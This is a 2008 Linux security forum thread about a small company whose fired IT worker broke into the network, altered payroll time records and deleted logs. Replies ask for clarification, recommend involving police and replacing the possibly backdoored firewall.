Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
I assume that means you want to set up a NAT/masquerading firewall? If not, please clarify what you mean by "mask our WAN IP". The reason I'm asking this is because you've stated you are running a CentOS-based firewall, which sort of implies that you might already be doing NAT/masquerading. Also, if possible, please provide at least a basic overview of the intrusion you experienced, why "masking your WAN IP" would prevent if from happening again, and what your current network setup looks like.
Allow an East Tennessee hillbilly to attempt to translate into Western North Carolina hillbilly
There are several reasons we are asking about the nature of the attack, network layout, and so forth. Your goal of "masking the WAN IP" is terribly ambiguous, and sounds more like an excuse to use buzz words rather than an actual request. Your boss might as well ask you to reboot the Internet. Besides, when asking for help, it's usually better to describe the symptoms than to speculate wildly about a solution. The solution you seek may not be appropriate for the vulnerability that was exploited.
For instance, if the attack was a website defacement, then no amount of tweaking your firewall will plug the hole that allowed the SQL injection. If, on the other hand, the Windows machines behind your firewall got infected by a zombie botnet, that's a different solution as well (although blocking outbound IRC and P2P using a traffic shaper of some sort couldn't hurt).
If I were to interpret your boss's request literally (and it hurts my head to do so), I would say he's asking you to put a firewall in front of your firewall.
In the companies that I've worked with the term WAN usually applies to a network that connects multiple sites or locations. The vast majority of these would be connected via routers using seperate subnets.
If you are discussing an internet security on a firewall, that is another matter. The other posters are asking for more specifics so that they can help you with your issue. They aren't just giving you a hard time. To help we would need at the very least, what current firewall you are using, what the nature of the breach was, and a basic overview of your network.
True, the Internet is by definition a WAN - but you don't need the Internet to have a WAN, as pointed-out by javaroast. And as mentioned by calraith (and myself), the OP's description of the problem and the plan of action is quite vague. This is evidenced by this WAN discussion itself (we don't know what kind of WAN the OP means). Let's wait for the OP to get back to us with more information so that we may be able to better understand the situation and provide any necessary assistance.
True,the Internet is by definition a WAN - but you don't need the Internet to have a WAN
True,but we need WANs to have the Internet............and that is true but I'm just kidding.
I had to say that Internet is WAN because people often have misconceptions about that.
You're right,OP should post more infomartion.
Last edited by alan_ri; 06-26-2008 at 06:30 PM.
Reason: grammar
Location: mountains of Western North Carolina and Daytona Beach
Distribution: Redhat 8.0/mozilla
Posts: 60
Original Poster
Rep:
Thank you everyone for your posts.
here is some background:
1. the IT guy I replaced hacked into our network the weekend after he was fired and changed the time clock so his last paycheck would be increased (boss thinks he setup a backdoor)
2. I changed all passwords and searched logfiles, which he deleted after he got into our network
3. my firewall experience prior to this job was a Watchguard 700, so I need help with linux
4. a friend of my boss told him his IT person changed his ip (masquerade?) among other measures and secured his network
5. my boss has very limited knowledge of computers!
I am new at this job and they are hard to find right now, so any help would be very appreciated
Replace that firewall IMMEDIATELY. Yank the WAN link now. There are MANY backdoors he could have put on it. The list is almost endless.
Since you are new to linux, I suggest installing one of the free simple linux-based firewalls, such as Untangle. Just download the cd and boot it to install. They are very easy to install, configure and manage.
Thank you everyone for your posts:
here is some background:
1. the IT guy I replaced hacked into our network the weekend after he was fired and changed the time clock so his last paycheck would be increased (boss thinks he setup a backdoor)
Since this person thereby committed fraud, call the police. He also seems to have violated state and/or federal computer-crime statutes: call the police.
Quote:
2. I changed all passwords and searched logfiles, which he deleted after he got into our network
3. my firewall experience prior to this job was a Watchguard 700, so I need help with linux
4. a friend of my boss told him his IT person changed his ip (masquerade?) among other measures and secured his network
5. my boss has very limited knowledge of computers!
I am new at this job and they are hard to find right now, so any help would be very appreciated
A firewall won't help you with someone who knew a password. If you changed all the passwords (login, database, everything) he probably can't get-in anymore.
"A friend of my boss" probably does not have accurate information in this case; in fact, I think he-or-she doesn't. You are dealing with a "jilted-lover attack," the hardest kind.
Be sure to keep careful track of time since all of this might serve as actual-damages proof that might be helpful in adding a couple more years to the time this person could spend behind bars. No, I'm not kidding.
If you changed all the passwords (login, database, everything) he probably can't get-in anymore.
Sure he can. For example, he can have the CentOS box have a cron job to initiate a tunnel to his home box. There are lots of ways.
I would replace the firewall completely. Set it aside. Hell, go to the store and buy a cheap Linksys router/firewall, and use it for now. They are cheap ~$50.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.